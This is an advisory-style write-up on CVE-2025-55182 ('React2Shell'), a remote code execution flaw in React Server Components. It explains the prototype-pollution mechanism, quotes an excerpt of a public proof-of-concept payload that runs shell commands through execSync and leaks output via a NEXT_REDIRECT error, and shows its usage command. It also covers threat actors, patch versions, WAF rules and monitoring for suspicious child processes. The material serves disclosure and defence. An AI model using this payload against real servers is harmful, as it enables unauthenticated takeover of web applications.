CVE-2025-55182 - React to Shell (RCE)
Overview
CVE-2025-55182, also known as React2Shell, is a critical unauthenticated Remote Code Execution (RCE) vulnerability in React Server Components (RSC). Disclosed on December 3, 2025, it affects popular frameworks like Next.js.
The vulnerability allows an attacker to execute arbitrary code with the privileges of the web server process by sending a single, specially crafted HTTP request.
- CVSS Score: 10.0 (Critical)
- Vector: Unauthenticated Netzwerk / RCE
Affected Versions
The following versions of React Server Components are vulnerable:
react-server-dom-webpack: 19.0.0, 19.1.0, 19.1.1, 19.2.0react-server-dom-parcel: 19.0.0, 19.1.0, 19.1.1, 19.2.0react-server-dom-turbopack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
Exploitation Mechanism
The vulnerability stems from an insecure handling of serialized data in React Server Components. Attackers can leverage Prototype Pollution within the RSC environment to overwrite internal properties.
By targeting specific "thenable" objects and polluting the prototype chain, an attacker can redirect the execution flow to a dangerous sink, such as child_process.execSync (in Node.js environments).
Key Payload Components:
- Prototype Pollution: Overwriting
__proto__.thenor similar internal hooks. - Sink Injection: Using
process.mainModule.require('child_process').execSyncto execute system commands. - Response Redirection: Often combined with a
NEXT_REDIRECTerror to leak the command output via URL parameters or headers.
Proof of Concept (PoC)
Below is an analysis of the exploit script provided by surajhacx (opens in a new tab).
Exploit Script (exploit.py)
# Extrait du PoC de surajhacx/react2shellpoc
# Injection logic focus:
def build_exploit_payload(command):
safe_cmd = sanitize_command(command)
injection = (
'{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,'
'"value":"{\\\\\"then\\\\\":\\\\\"$B1337\\\\\"}\",\"_response\":{\"_prefix\":'
f'\"var res=process.mainModule.require(\\'child_process\\').execSync(\\'{safe_cmd}\\')'
'.toString().trim().replace(/\\\\\\\\n/g, \\' | \\');;throw Object.assign(new Error(\\'NEXT_REDIRECT\\'),'
'{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\",\"_chunks\":\"$Q2\",'
'\"_formData\":{\"get\":\"$1:constructor:constructor\"}}}'
)
# ... multipart/form-data assembly ...Usage
python3 exploit.py -u http://target-app.com -c "id"Threat Intelligence (Real-world Exploitation)
Google Threat Intelligence Group (GTIG) and other security firms have observed widespread exploitation by various threat actors:
| Threat Actor | Payload / Malware | Behavior |
|---|---|---|
| UNC6600 (China-nexus) | MINOCAT | ELF tunneler using Fast Reverse Proxy (FRP). |
| UNC6586 (China-nexus) | SNOWLIGHT | Go-based downloader masquerading as legitimate files. |
| UNC6588 | COMPOOD | Backdoor masquerading as Vim. |
| UNC6603 | HISONIC | Go-based implant using Cloudflare/GitLab for config. |
| Cybercriminals | XMRig | Deployment of cryptocurrency miners. |
Remediation
1. Patch Immediately
Update react-server-dom-* packages to one of the following versions (or later):
- 19.0.1
- 19.1.2
- 19.2.1
- 19.2.2 (Fixes follow-on information disclosure CVE-2025-55183)
- 19.2.3 (Fixes follow-on DoS CVE-2025-55184 / CVE-2025-67779)
2. WAF Rules
Deploy Web Application Firewall (WAF) rules to detect and block RSC-specific injection attempts. Google Cloud Armor, AWS WAF, and others have released specific rules for CVE-2025-55182.
3. Monitoring
- Audit dependencies for vulnerable RSC packages.
- Monitor for suspicious child processes initiated by the web server (e.g.,
curl,wget,sh,bash). - Look for IOCs like hidden directories (
$HOME/.systemd-utils) or unauthorized cron jobs.